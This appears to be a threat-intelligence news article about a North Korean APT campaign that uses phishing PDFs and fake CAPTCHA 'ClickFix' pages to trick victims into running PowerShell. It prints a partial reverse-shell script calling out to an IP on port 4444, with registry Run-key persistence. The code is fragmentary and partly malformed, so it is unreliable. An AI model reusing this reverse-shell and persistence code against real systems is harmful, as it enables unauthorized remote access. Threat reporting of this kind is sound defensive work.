A sophisticated cyber espionage campaign attributed to the North Korean advanced persistent threat (APT) group Velvet Chollima has emerged, targeting South Korean government officials and organizations across multiple continents through weaponized PDF documents and innovative social engineering techniques.
The Velvet Chollima APT group has launched an extensive cyber campaign beginning in January 2025, specifically targeting South Korean government officials, NGOs, government agencies, and media companies across North America, South America, Europe, and East Asia.
The attackers employ a sophisticated multi-stage approach that begins with carefully crafted spear-phishing emails containing malicious PDF attachments designed to establish initial contact with high-value targets.
.png
)
The campaign demonstrates a significant evolution in social engineering tactics, with attackers masquerading as legitimate South Korean government officials to gradually build trust with their intended victims.
This patient approach allows the threat actors to establish rapport before delivering their malicious payloads, making the subsequent attack more likely to succeed.
.webp)
Offensive Security Engineer Abdulrehman Ali identified this attack pattern as part of a comprehensive adversary simulation based on research from Microsoft’s Threat Intelligence team.
The analysis reveals that when targets attempt to open the seemingly legitimate PDF documents, they are redirected to fraudulent device registration pages that employ a deceptive technique known as ClickFix.
The ClickFix technique represents a concerning advancement in social engineering methodology, utilizing fake CAPTCHA verification pages to manipulate victims into executing malicious PowerShell commands.
This approach bypasses traditional security measures by convincing users to voluntarily run administrator-level commands on their systems.
Infection Mechanism and Payload Delivery
The core of the Velvet Chollima attack relies on a sophisticated fake CAPTCHA interface that automatically copies malicious PowerShell code to the victim’s clipboard.
.webp)
The weaponized script establishes a reverse shell connection while implementing persistence mechanisms through Windows registry modifications:
while ($true) {
try {
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.10', 4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
// Registry persistence
$regPath = "HKCU:SoftwareMicrosoftWindowsCurrentVersionRun"
Set-ItemProperty -Path $regPath -Name $regName -Value $regValueThis payload enables remote command execution while ensuring persistence across system reboots, maintaining unauthorized access to compromised systems.
Try in-depth sandbox malware analysis for your SOC team. Get ANY.RUN special offer only until May 31 -> Try Here
